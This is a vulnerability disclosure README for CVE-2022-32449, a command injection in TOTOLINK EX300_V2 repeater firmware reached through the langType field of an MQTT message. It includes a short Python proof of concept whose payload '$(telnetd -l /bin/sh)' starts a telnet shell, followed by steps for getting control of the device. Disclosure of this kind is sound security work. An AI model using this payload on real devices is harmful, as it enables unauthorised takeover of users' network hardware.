CVE-2022-32449: CVE/README.md at main · winmt/CVE
TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet.
Vendor of the products: TOTOLINK
Vendor’s website: http://www.totolink.cn
Reported by: WangJincheng([email protected]) & ShaLetian([email protected])
Affected products: TOTOLINK EX300_V2
Affected firmware version: V4.0.3c.7484
Firmware download address: http://www.totolink.cn/data/upload/20210720/b351052836a4fc7e1575dc513afc02b1.zip
TOTOLINK EX300_V2 V4.0.3c.7484 has a command injection vulnerability detected at function setLanguageCfg. Attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.
Show the product
TOTOLINK EX300_V2 is a Wi-Fi repeater made in China.
Vulnerability details
The vulnerability is detected at /bin/cste_modules/global.so.
In the function setLanguageCfg, the content obtained by program through parameter langType given by MQTT data packet is passed to variable Var. Then, the variable Var is formatted into v9 through the function sprintf without any check. Finally, v9 is passed as an argument to the function CsteSystem which can execute system commands.
Above all, attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.
import paho.mqtt.client as mqtt
client = mqtt.Client() client.connect("", 1883, 60) client.publish("totolink/router/setLanguageCfg", ‘{"langType": "$(telnetd -l /bin/sh)"}’)
Get shell
At first, we run the above script to exploit the vulnerability.
Then, we scan ports and dectect that the port 23 which represents Telnet service has been opened.
Finally, we telnet into the Wi-Fi repeater through port 23 and control it successfully.